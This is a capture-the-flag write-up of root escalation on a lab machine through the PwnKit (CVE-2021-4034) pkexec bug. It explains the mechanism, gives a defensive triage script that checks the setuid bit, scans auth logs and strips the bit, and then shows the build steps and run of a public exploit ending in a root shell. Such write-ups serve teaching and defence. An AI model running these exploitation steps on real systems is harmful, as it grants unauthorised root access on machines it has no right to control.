PEAS (LinPEAS) flagged the target system as vulnerable to CVE-2021-4034 (PwnKit), a local privilege escalation in polkit's setuid helper pkexec.
CVE-2021-4034
A vulnerability classified as critical was found in polkit (unknown version). It affects some unknown processing of the file /usr/bin/pkexec; manipulation with an unknown input leads to an access-control vulnerability, declared under CWE-284: the software does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. Confidentiality, integrity and availability are all impacted.
That generic database text hides the mechanism, which matters for both exploitation and detection. pkexec is setuid root and assumes argc is at least 1. Executed with an empty argument list (argc == 0), it reads argv[1], which lies just past the end of argv and aliases envp[0]; if that string is not an absolute path, pkexec resolves it through PATH and writes the result back to argv[1], i.e. straight into the environment. An attacker who controls envp[0] and PATH can therefore smuggle a variable such as GCONV_PATH past the sanitising pkexec does on its environment, and glibc's iconv then loads an attacker-supplied shared object with root privileges. That is exactly what the exploit's build steps below prepare: a gconv-modules file and a directory literally named GCONV_PATH=. containing the malicious module. NVD accordingly files the bug under CWE-787 (out-of-bounds write) rather than CWE-284. Exploitation needs only local code execution and the setuid bit on pkexec; it does not depend on polkit's authorisation policy.
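Before reaching for a public exploit it is worth confirming exposure and seeing what the auth log already shows. The script below is an added example for this writeup, not code from the page or from the exploit repository it uses. It assumes pkexec lives at /usr/bin/pkexec and that auth events land in /var/log/auth.log (both overridable), and the sample log lines it embeds are constructed rather than captured from the Nibbles box. It checks the setuid bit (without it PwnKit has nothing to escalate through), greps for the rejection messages pkexec logs when it refuses a suspicious environment, and applies the interim mitigation the advisory recommended, dropping the setuid bit until the patched package is installed.

```shell
#!/bin/sh
# PwnKit (CVE-2021-4034) triage helper. Added example for this writeup, not
# code from the page or from the exploit repository it uses.
# Assumptions: pkexec at /usr/bin/pkexec, auth events in /var/log/auth.log
# (both overridable); the sample log written by write_sample_log is
# constructed, not captured from the target.

# Returns 0 if FILE exists and carries the setuid bit. Without setuid there
# is nothing to escalate through, so this is the first thing to check.
pkexec_is_setuid() {
    f="$1"
    [ -f "$f" ] && [ -n "$(find "$f" -perm -4000 -print 2>/dev/null)" ]
}

# Interim mitigation published with the advisory: drop the setuid bit.
# Legitimate pkexec use breaks until the patched polkit package is installed.
strip_setuid() {
    chmod 0755 "$1"
}

# Lines pkexec logs when it rejects a suspicious environment. Clumsy attempts,
# and attempts against a patched pkexec, leave these; a careful attacker on an
# unpatched host can avoid them, so their absence proves nothing.
pwnkit_log_traces() {
    grep -hE 'pkexec.*(SHELL variable was not found|contains sus[a-z]* content)' "$@" 2>/dev/null
}

pwnkit_trace_count() {
    pwnkit_log_traces "$@" | wc -l | tr -d ' '
}

# Constructed sample of what such lines look like in auth.log (assumed format).
write_sample_log() {
    t=$(mktemp)
    cat >"$t" <<'EOF'
Jan 26 10:14:02 nibbles sshd[1201]: Accepted password for nibbler from 10.10.14.2 port 51234 ssh2
Jan 26 10:15:40 nibbles pkexec[1410]: nibbler: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=GCONV_PATH=./pwnkit.so:.]
Jan 26 10:15:41 nibbles pkexec[1412]: nibbler: The value for environment variable GCONV_PATH contains suscipious content [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=]
Jan 26 10:16:00 nibbles systemd-logind[880]: New session 4 of user nibbler.
EOF
    printf '%s\n' "$t"
}

# Report exposure and any traces; never fails, so it is safe in a cron job.
triage() {
    pk="${1:-/usr/bin/pkexec}"
    log="${2:-/var/log/auth.log}"
    if pkexec_is_setuid "$pk"; then
        echo "[!] $pk is setuid: exposed unless the polkit package is patched"
        echo "    interim mitigation: chmod 0755 $pk"
    else
        echo "[ ] $pk missing or not setuid: PwnKit cannot be used here"
    fi
    n=$(pwnkit_trace_count "$log")
    echo "[i] $n PwnKit-style pkexec rejections in $log"
    pwnkit_log_traces "$log"
    return 0
}

triage "$@"
```

Run it as `sh triage.sh [pkexec-path] [auth-log]`; on the box above the first line of output is the finding that matters, since the nibbler shell already provides the local code execution the bug requires.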
Exploit (PwnKit)
I found the exploit online
Privilege Escalation
nibbler@nibbles:/tmp$ unzip main.zip
Archive:  main.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
creating: CVE-2021-4034-main/
inflating: CVE-2021-4034-main/.gitignore
inflating: CVE-2021-4034-main/LICENSE
inflating: CVE-2021-4034-main/Makefile
inflating: CVE-2021-4034-main/README.md
inflating: CVE-2021-4034-main/cve-2021-4034.c
inflating: CVE-2021-4034-main/cve-2021-4034.sh
creating: CVE-2021-4034-main/dry-run/
inflating: CVE-2021-4034-main/dry-run/Makefile
inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
inflating: CVE-2021-4034-main/pwnkit.c
nibbler@nibbles:/tmp$ cd CVE-2021-4034-main/
nibbler@nibbles:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
nibbler@nibbles:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
# whoami
root
# hostname
Nibbles
# ifconfig
ens192    Link encap:Ethernet  HWaddr 00:50:56:b9:48:c7
          inet addr:10.10.10.75  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:feb9:48c7/64 Scope:Link
          inet6 addr: dead:beef::250:56ff:feb9:48c7/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3473 errors:0 dropped:15 overruns:0 frame:0
          TX packets:3062 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1140032 (1.1 MB)  TX bytes:935844 (935.8 KB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)
System Level Compromise